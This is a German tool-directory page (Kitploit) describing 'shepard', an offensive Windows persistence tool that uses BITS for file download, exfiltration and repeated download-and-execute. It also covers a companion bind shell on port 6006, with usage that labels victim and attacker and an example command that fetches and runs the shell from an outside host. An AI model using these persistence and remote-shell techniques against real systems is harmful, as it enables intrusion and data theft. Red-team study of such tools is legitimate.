Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
shepard — In Arbeit befindliches persistentes Download-/Upload-/Ausführungstool unter Verwendung von Windows BITS. | Kitploit
Tools/GitHubGitHub/d3adzo/shepard
PersistenzmechanismenDatenexfiltrationPost-ExploitationCommand and ControlRed TeamingRemote-Access-Tool
GitHubd3adzo/shepard

shepard

In Arbeit befindliches persistentes Download-/Upload-/Ausführungstool unter Verwendung von Windows BITS.

Repository anzeigen
413vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

SHEPARD

BITS

Dies ist ein Persistenz-Tool, das den Windows Background Intelligent Transfer Service (BITS) verwendet.

Funktionalität

Datei-Download, Datei-Exfiltration, Datei-Download + persistente Ausführung

Verwendung

Führen Sie shepard.exe als Administrator mit den folgenden Befehlszeilenargumenten aus:

-d <remoteLocation> <writePath> : regulärer Datei-Download in einen lokalen Pfad Ihrer Wahl

-e <remoteLocation> <localPath> : regulärer Datei-Upload von einem lokalen Pfad Ihrer Wahl (sendet nur an IIS-Server, dies ist eine Einschränkung von BITS)

-dr <remoteLocation> <writePath> [optionalFileArgs] : Datei-Download in einen Pfad Ihrer Wahl und versucht, Persistenz aufrechtzuerhalten. Die heruntergeladene Datei wird versuchen, mit optionalFileArgs ausgeführt zu werden, und BITS wird alle 30 Sekunden überprüfen, ob die Datei auf dem kompromittierten System noch läuft.

Wenn dieses Programm ohne Argumente oder mit einer falschen Anzahl von Argumenten ausgeführt wird, wird shepard sauber beendet.

BINDSHELL

Der Server (Opfer) ist in C# geschrieben. Er hört auf Port 6006.

Verwendung des Opfers

Führen Sie shepardsbind_serv.exe ohne Argumente aus.

Der Client (Angreifer) ist in Python geschrieben und benötigt ein Argument: die IP-Adresse des Opferrechners.

Server-Verwendung

shepardsbind_recv.py <victim's IP>

Die Ausführung von shepardsbind_recv.py ohne Argumente gibt einen Fehler zurück.

Verwendung in Kombination

Die einzige ausführbare Datei, die sich auf dem Opferrechner befinden muss, ist shepard.exe. Hosten Sie die herunterzuladende Bindshell-Programmdatei an einem öffentlich zugänglichen Ort. Shepard wird die Bindshell-Programmdatei herunterladen und ausführen, und der Benutzer kann nun den Python-Empfänger verwenden. Wenn die Shell gefunden und beendet wird, startet sie nach 30 Sekunden neu.

Beispiel: shepard.exe -dr http://location.com/shepardsbind_serv.exe C:\Users\Administrator\file.exe

Tool herunterladen